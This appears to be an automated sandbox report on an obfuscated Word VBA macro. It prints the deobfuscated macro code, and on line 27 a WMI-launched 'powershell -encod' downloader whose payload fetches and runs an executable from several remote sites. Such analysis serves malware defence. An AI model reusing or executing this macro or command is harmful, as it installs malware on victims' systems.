Part of subcall function R3tnEz2D@JIodCjfv: Tan
Part of subcall function R3tnEz2D@JIodCjfv: DtWubh
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: NdN1rET
Part of subcall function R3tnEz2D@JIodCjfv: NosNmj4
Part of subcall function R3tnEz2D@JIodCjfv: kZ3OzYB
Part of subcall function R3tnEz2D@JIodCjfv: TtIw36Hv
Part of subcall function R3tnEz2D@JIodCjfv: CStr
Part of subcall function R3tnEz2D@JIodCjfv: pkcNH7C
Part of subcall function R3tnEz2D@JIodCjfv: rbJdmEz
Part of subcall function R3tnEz2D@JIodCjfv: ZwwF3I
Part of subcall function R3tnEz2D@JIodCjfv: qcOQjrD
Part of subcall function R3tnEz2D@JIodCjfv: ChrW
Part of subcall function R3tnEz2D@JIodCjfv: Oct
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: Fix
Part of subcall function R3tnEz2D@JIodCjfv: mwv_hRR
Part of subcall function R3tnEz2D@JIodCjfv: cCsukAJS
Part of subcall function R3tnEz2D@JIodCjfv: T4t4PSN
Part of subcall function R3tnEz2D@JIodCjfv: Sin
Part of subcall function R3tnEz2D@JIodCjfv: WrztcmHX
Part of subcall function R3tnEz2D@JIodCjfv: N06UkOi
Part of subcall function R3tnEz2D@JIodCjfv: sNGNZi
Part of subcall function R3tnEz2D@JIodCjfv: CreateObject
Part of subcall function R3tnEz2D@JIodCjfv: lTzGN9z
Part of subcall function R3tnEz2D@JIodCjfv: QFa7Tzv
Part of subcall function R3tnEz2D@JIodCjfv: RI34Jc
Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672
Part of subcall function R3tnEz2D@JIodCjfv: ZD4NzNKp
Part of subcall function R3tnEz2D@JIodCjfv: dYFvGWI
Part of subcall function R3tnEz2D@JIodCjfv: Tan
Part of subcall function R3tnEz2D@JIodCjfv: OObwzR
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: EIw3Db08
Part of subcall function R3tnEz2D@JIodCjfv: T1TAVR_L
Part of subcall function R3tnEz2D@JIodCjfv: SXvvII2T
Part of subcall function R3tnEz2D@JIodCjfv: S1hkHVH
Part of subcall function R3tnEz2D@JIodCjfv: CStr
Part of subcall function R3tnEz2D@JIodCjfv: a1QujnI
Part of subcall function R3tnEz2D@JIodCjfv: uJwlJz
Part of subcall function R3tnEz2D@JIodCjfv: Pt5_Krw
Part of subcall function R3tnEz2D@JIodCjfv: mjvrs8a
Part of subcall function R3tnEz2D@JIodCjfv: ChrW
Part of subcall function R3tnEz2D@JIodCjfv: Oct
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: Fix
Part of subcall function R3tnEz2D@JIodCjfv: df7KLz
Part of subcall function R3tnEz2D@JIodCjfv: rLX5_E
Part of subcall function R3tnEz2D@JIodCjfv: qhEL6us
Part of subcall function R3tnEz2D@JIodCjfv: Sin
Part of subcall function R3tnEz2D@JIodCjfv: RWp2lz
Part of subcall function R3tnEz2D@JIodCjfv: DHQs26
Part of subcall function R3tnEz2D@JIodCjfv: CKCNjv
Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672
Part of subcall function R3tnEz2D@JIodCjfv: hUPJJL
Part of subcall function R3tnEz2D@JIodCjfv: oihAvpA
Part of subcall function R3tnEz2D@JIodCjfv: Tan
Part of subcall function R3tnEz2D@JIodCjfv: DkkCTnu
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: mQZoi014
Part of subcall function R3tnEz2D@JIodCjfv: uNL_Qm
Part of subcall function R3tnEz2D@JIodCjfv: EhPXLwZr
Part of subcall function R3tnEz2D@JIodCjfv: fzbTzG6
Part of subcall function R3tnEz2D@JIodCjfv: CStr
Part of subcall function R3tnEz2D@JIodCjfv: T6H6cL
Part of subcall function R3tnEz2D@JIodCjfv: U4kTbL8o
Part of subcall function R3tnEz2D@JIodCjfv: rkbEFdX
Part of subcall function R3tnEz2D@JIodCjfv: Iofqhj
Part of subcall function R3tnEz2D@JIodCjfv: ChrW
Part of subcall function R3tnEz2D@JIodCjfv: Oct
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: Fix
Part of subcall function R3tnEz2D@JIodCjfv: fIDOjLzQ
Part of subcall function R3tnEz2D@JIodCjfv: qf2EbLqm
Part of subcall function R3tnEz2D@JIodCjfv: AuOCYR
Part of subcall function R3tnEz2D@JIodCjfv: Sin
Part of subcall function R3tnEz2D@JIodCjfv: R65fhvwm
Part of subcall function R3tnEz2D@JIodCjfv: FnZwmD_A
Part of subcall function R3tnEz2D@JIodCjfv: KUA7zY
Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672
Part of subcall function R3tnEz2D@JIodCjfv: ls9iOFd
Part of subcall function R3tnEz2D@JIodCjfv: EnzDZGz
Part of subcall function R3tnEz2D@JIodCjfv: Tan
Part of subcall function R3tnEz2D@JIodCjfv: AtZoc6
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: uDNHZRDB
Part of subcall function R3tnEz2D@JIodCjfv: MLzjlI
Part of subcall function R3tnEz2D@JIodCjfv: OuoioTjO
Part of subcall function R3tnEz2D@JIodCjfv: h0IdWK
Part of subcall function R3tnEz2D@JIodCjfv: CStr
Part of subcall function R3tnEz2D@JIodCjfv: Gtz6Hz
Part of subcall function R3tnEz2D@JIodCjfv: NWWiIQQi
Part of subcall function R3tnEz2D@JIodCjfv: S10zzpNS
Part of subcall function R3tnEz2D@JIodCjfv: j7Ysl2IC
Part of subcall function R3tnEz2D@JIodCjfv: ChrW
Part of subcall function R3tnEz2D@JIodCjfv: Oct
Part of subcall function R3tnEz2D@JIodCjfv: CDate
Part of subcall function R3tnEz2D@JIodCjfv: Fix
Part of subcall function R3tnEz2D@JIodCjfv: LInuIc64
Part of subcall function R3tnEz2D@JIodCjfv: jR1PlbP
Part of subcall function R3tnEz2D@JIodCjfv: cn3bSi
Part of subcall function R3tnEz2D@JIodCjfv: Sin
Part of subcall function R3tnEz2D@JIodCjfv: GY7qmRZw
Part of subcall function R3tnEz2D@JIodCjfv: hfW56jn
Part of subcall function R3tnEz2D@JIodCjfv: FJHJlhv
khjUo3du
xqmm6672
wWOoNnTo
MSfBRT
Tan
z5liGH
CDate
TuYSA6
KWit9B
tqXjFCw
pSZQnNn
CStr
wT5D9BcE
wMR9tP
LDjJ6zM
bUqA9z5
ChrW
Oct
CDate
Fix
jYQWvaN
vDZE63w
UYGTL2Tr
Sin
CmXBWjb
X975_m
zcazMGDf
xqmm6672
Pu1R8IUO
aXF2_4qQ
Tan
tcDLLb
CDate
lsaWRUr
ShWp3jNB
tnXUzJ0O
MM3V6h
CStr
GdQwslU
j_72KM
HpAvVal
cLEAWn
ChrW
Oct
CDate
Fix
lA6KKk
J3J3pfPR
hzkYTP82
Sin
cISYkJs
Sff8wzaz
B8wUj_W

Strings	Decrypted Strings
"IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3"

Line	Instruction	Meta Information
2	Function dztj37()
3	On Error Resume Next	executed
4	Set mna = xqmm6672	xqmm6672
5	Do	PcG7it_ zir7hM
6	If M3oCwG = PFAGKSc Then	M3oCwG PFAGKSc
7	HnhIwa = Tan(1141)	Tan
8	Endif
9	R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))	Btc0KuW CDate fCMUHn pUBdAcb WLAEkzsu z5_aQ54 CStr q2NS516 uBRAVT
10	For Each jMCQik in tkw6vj	tkw6vj
11	CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)	oc2GT0i ChrW Oct CDate Fix FRqJIU MAPHFj A9hSFQf9 Sin Bt4u6CG
12	Next	tkw6vj
13	Loop Until PcG7it_ = zir7hM	PcG7it_ zir7hM
14	kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_	vq219c zJWspwz VHfL_K2S YAHvQ_
15	On Error Resume Next
16	Set mna = xqmm6672	xqmm6672
17	Do	lnY3HW jXUw9Oz
18	If LXv84MXp = JSjBjs Then	LXv84MXp JSjBjs
19	rZcdZKRX = Tan(1141)	Tan
20	Endif
21	wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))	TAw0Fzm CDate C0DzNIbd dpjKqtAS iaXsMY1 TniCd0t CStr k5bY2L t1HQFfiz
22	For Each fVn1T1_ in BnCM82w	BnCM82w
23	zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)	ZNRIEN ChrW Oct CDate Fix Ghn4llZ UF1nKaU6 wDZDIUTV Sin L8Zz21
24	Next	BnCM82w
25	Loop Until lnY3HW = jXUw9Oz	lnY3HW jXUw9Oz
27	CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du	SWbemObjectEx.Create("powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA",,,) -> 0 ZKnIZEfd khjUo3du executed
28	On Error Resume Next
29	Set mna = xqmm6672	xqmm6672
30	Do	X975_m zcazMGDf
31	If wWOoNnTo = MSfBRT Then	wWOoNnTo MSfBRT
32	QvB9VD = Tan(1141)	Tan
33	Endif
34	z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))	z5liGH CDate TuYSA6 KWit9B tqXjFCw pSZQnNn CStr wT5D9BcE wMR9tP
35	For Each mjHV7os in LDjJ6zM	LDjJ6zM
36	XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)	bUqA9z5 ChrW Oct CDate Fix jYQWvaN vDZE63w UYGTL2Tr Sin CmXBWjb
37	Next	LDjJ6zM
38	Loop Until X975_m = zcazMGDf	X975_m zcazMGDf
40	On Error Resume Next
41	Set mna = xqmm6672	xqmm6672
42	Do	Sff8wzaz B8wUj_W
43	If Pu1R8IUO = aXF2_4qQ Then	Pu1R8IUO aXF2_4qQ
44	EaYS6RQw = Tan(1141)	Tan
45	Endif
46	nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))	tcDLLb CDate lsaWRUr ShWp3jNB tnXUzJ0O MM3V6h CStr GdQwslU j_72KM
47	For Each mWYlNTFO in HpAvVal	HpAvVal
48	iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)	cLEAWn ChrW Oct CDate Fix lA6KKk J3J3pfPR hzkYTP82 Sin cISYkJs
49	Next	HpAvVal
50	Loop Until Sff8wzaz = B8wUj_W	Sff8wzaz B8wUj_W
51	End Function

Function UMvDUH, APIs: 53, Strings: 3, Number of lines: 25, Relevance: 103.275

APIs	Meta Information
xqmm6672
CP2pOzYD
m_MLhXX
Tan
huhEoJG
CDate
az_UGd0
a21jZbL3
pn7zEK
N0vGGku
CStr
fMoOoWO3
EUG4z12
nP1obkp
HG0RQi
ChrW
Oct
CDate
Fix
zqDQZ7
YjRQrq
Hz5p3D
Sin
mjjrHIf
Xb5lam
diSWXniz
Replace	Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3 Replace("poweIuH3rsheIuH3ll -IuH3encoIuH3d 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,"IuH3","") -> powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA Replace("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3","IuH3","") -> winmgmts:Win32_Process Replace(winmIuH3gmtsIuH3:WinIuH332_PIuH3roceIuH3ssStIuH3artuIuH3p,"IuH3","") -> winmgmts:Win32_ProcessStartup
xqmm6672
wMBYtY
O_vT8j
Tan
EqHGmqzs
CDate
p2VQvUjT
nJES0LA
WiwqHbr
XzCzPS7
CStr
FfJUME
wlzHbq
t3Fh05z
aGJjAH
ChrW
Oct
CDate
Fix
F97Z_Sb
Q0hGCzd
ojvDCQi
Sin
wNX30a
qaB0m7mo
E9cRqzhV

Strings	Decrypted Strings
""""
"09Nh"
"09NhI09NhuH09Nh309Nh"

Line	Instruction	Meta Information
52	Function UMvDUH(jNQUnno)
53	On Error Resume Next	executed
54	Set mna = xqmm6672	xqmm6672
55	Do	Xb5lam diSWXniz
56	If CP2pOzYD = m_MLhXX Then	CP2pOzYD m_MLhXX
57	UPMZSQ = Tan(1141)	Tan
58	Endif
59	busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))	huhEoJG CDate az_UGd0 a21jZbL3 pn7zEK N0vGGku CStr fMoOoWO3 EUG4z12
60	For Each d_7JYztz in nP1obkp	nP1obkp
61	HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)	HG0RQi ChrW Oct CDate Fix zqDQZ7 YjRQrq Hz5p3D Sin mjjrHIf
62	Next	nP1obkp
63	Loop Until Xb5lam = diSWXniz	Xb5lam diSWXniz
64	UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")	Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3 executed
65	On Error Resume Next
66	Set mna = xqmm6672	xqmm6672
67	Do	qaB0m7mo E9cRqzhV
68	If wMBYtY = O_vT8j Then	wMBYtY O_vT8j
69	mEczi1 = Tan(1141)	Tan
70	Endif
71	ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))	EqHGmqzs CDate p2VQvUjT nJES0LA WiwqHbr XzCzPS7 CStr FfJUME wlzHbq
72	For Each HV_KNz in t3Fh05z	t3Fh05z
